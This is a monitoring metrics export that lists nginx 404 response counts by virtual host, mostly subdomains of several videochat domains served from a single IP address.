nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.tv.br"} 2240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mrj.videochat.world"} 2162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.cafe"} 1960 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.date"} 780 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.mx"} 7290 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.show"} 324 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.tv.br"} 2484 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ms.videochat.world"} 5346 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="msehgsk.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.cafe"} 3696 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.date"} 777 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.mx"} 11891 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.show"} 394 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.tv.br"} 2608 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mt.videochat.world"} 5503 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mta-sts.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mwxipmt.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="mxnkcsw.videochat.mx"} 81 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.cafe"} 2186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.date"} 344 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.mx"} 5721 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.show"} 659 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.tv.br"} 1989 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="my.videochat.world"} 3641 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="myip.ipip.net"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="n1ccc.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nad.mj.game"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ncawath.videochat.mx"} 592 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nd-homes-vi.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.cafe"} 2518 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.date"} 1755 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.mx"} 11662 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.show"} 684 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.tv.br"} 2830 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ne.videochat.world"} 4368 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="neiljno.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="new.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="news.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ngydkta.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nkkeois.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nkrphet.videochat.mx"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.cafe"} 2381 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.date"} 645 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.mx"} 7434 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.show"} 391 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.tv.br"} 2585 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nl.videochat.world"} 5093 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.cafe"} 2286 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.date"} 3574 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.mx"} 10349 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.show"} 508 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.tv.br"} 2591 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="no.videochat.world"} 4490 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nopuekm.videochat.mx"} 353 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nsalsno.videochat.mx"} 131 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nsgqffa.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nuoqyen.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nvuxhmi.videochat.mx"} 184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nxcszkm.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nymwkpl.videochat.mx"} 321 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="nyucsbg.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="oaeccmn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="occjlro.videochat.mx"} 100 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ogbzzro.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ohrazfi.videochat.mx"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ohxaovdqcuyi.videochat.mx"} 130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="oijqaeo.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ojhbsnl.videochat.mx"} 494 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="oknfzen.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="oktuuel.videochat.mx"} 79 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="old.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="oliedtr.videochat.mx"} 128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="olprgel.videochat.mx"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="omfgchr.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="omsco.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ondqjms.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="one-api.ir"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="orientalcarpetcreationbbluebasilbrohml.videochat.mx"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="orvzqhe.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="osu.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="otrvbsi.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="owa.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="oxlioar.videochat.mx"} 551 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="oygzjsr.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ozoejel.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.cafe"} 2104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.date"} 371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.mx"} 6390 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.show"} 1261 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.tv.br"} 2210 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pa.videochat.world"} 2704 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="paosgi.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.cafe"} 1850 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.date"} 583 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.mx"} 7269 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.show"} 304 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.tv.br"} 2238 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pap.videochat.world"} 2096 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pbszvar.videochat.mx"} 392 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pdxecxblqbkn.videochat.mx"} 500 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pgrnikk.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pkiaram.videochat.mx"} 557 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.cafe"} 4436 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.date"} 5098 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.mx"} 6080 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.show"} 710 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.tv.br"} 3189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pl.videochat.world"} 5392 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="portal.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="postgres.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="prfhspa.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="production.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="proxypool.top"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.cafe"} 4202 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.date"} 2848 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.mx"} 7943 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.show"} 419 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pt.videochat.world"} 5039 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="pviwrky.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qaapiml.videochat.mx"} 166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qazwgnl.videochat.mx"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qbzgomg.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qdjvhda.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qdrqgda.videochat.mx"} 493 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qexrhmt.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qotztte.videochat.mx"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qouyvchm.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qshicka.videochat.mx"} 636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qvcrmgu.videochat.mx"} 111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qvsiwis.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qwctmaf.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="qxflfkk.videochat.mx"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="razilca.videochat.mx"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="razmthi.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="rbohjhr.videochat.mx"} 544 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="rcmjkkm.videochat.mx"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="rcmklda.videochat.mx"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="rcxxhxh.videochat.mx"} 205 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="reiseservice-stender.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="remote.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="rjlrspap.videochat.mx"} 199 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.cafe"} 2561 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.date"} 5652 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.mx"} 11241 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.show"} 509 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.tv.br"} 2231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ro.videochat.world"} 2789 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ruckus.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="rxwarht.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ryfusmrj.videochat.mx"} 653 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="s.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="s1.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sbpynjp.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.cafe"} 2419 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.date"} 379 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.mx"} 11821 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.show"} 523 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.tv.br"} 2402 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.world"} 2236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sdun.io"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sdxrfnl.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="secure.videochat.mx"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sefi.videochat.mx"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="semjnsl.videochat.mx"} 640 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="serve.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="server.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sfjtyzh.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="shgpjid.videochat.mx"} 371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="shop.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.cafe"} 2047 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.date"} 1561 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.mx"} 6822 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.show"} 795 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.tv.br"} 2247 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.world"} 2312 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="siqdpko.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sitemap.videochat.mx"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sitemaps.videochat.mx"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.cafe"} 3082 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.date"} 4815 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.mx"} 11612 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.show"} 312 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.tv.br"} 2783 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.world"} 4563 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.cafe"} 2968 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.date"} 4460 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.mx"} 8267 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.show"} 704 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.tv.br"} 3514 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.world"} 5515 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="slvdtur.videochat.mx"} 379 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="smzgimu.shop"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sptlqmk.videochat.mx"} 606 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.cafe"} 2283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.date"} 4753 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.mx"} 6631 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.show"} 277 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.tv.br"} 3035 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.world"} 2450 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ssl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="staging.videochat.mx"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="static.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="status.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="stl.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="store.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.cafe"} 2698 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.date"} 766 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.mx"} 6775 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.show"} 317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.tv.br"} 2011 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.world"} 2310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="support.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.cafe"} 5620 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.date"} 4983 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.mx"} 6664 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.show"} 872 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.tv.br"} 1888 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.world"} 2701 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="svttxga.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.cafe"} 4576 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.date"} 698 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.mx"} 5843 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.show"} 537 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.tv.br"} 2497 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.world"} 2218 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="swarajv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.cafe"} 1781 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.date"} 306 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.mx"} 6021 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.show"} 320 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.tv.br"} 2660 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.world"} 2372 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.cafe"} 2401 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.date"} 801 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.mx"} 7505 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.show"} 471 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.tv.br"} 2268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.world"} 5062 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="test.videochat.mx"} 96 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tfijrlilvami.videochat.mx"} 194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tfqsslt.videochat.mx"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.cafe"} 2344 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.date"} 1051 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.mx"} 7821 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.show"} 453 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.tv.br"} 2103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.world"} 4995 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.cafe"} 2806 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.date"} 741 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.mx"} 8116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.show"} 665 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.tv.br"} 2367 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.world"} 5667 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="thingsworko.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="thsvzsv.videochat.mx"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tiplpqwctmaf.videochat.mx"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tknyauk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tkzc668.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.cafe"} 2196 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.date"} 5202 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.mx"} 7065 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.show"} 547 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.tv.br"} 2063 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.world"} 5823 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tmfludki4a.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tokenid.rouwowu.ru"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tpjwrchm.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.cafe"} 2036 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.date"} 1004 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.mx"} 6834 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.show"} 462 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.tv.br"} 3015 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.world"} 2319 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="trmsmbe.videochat.mx"} 22 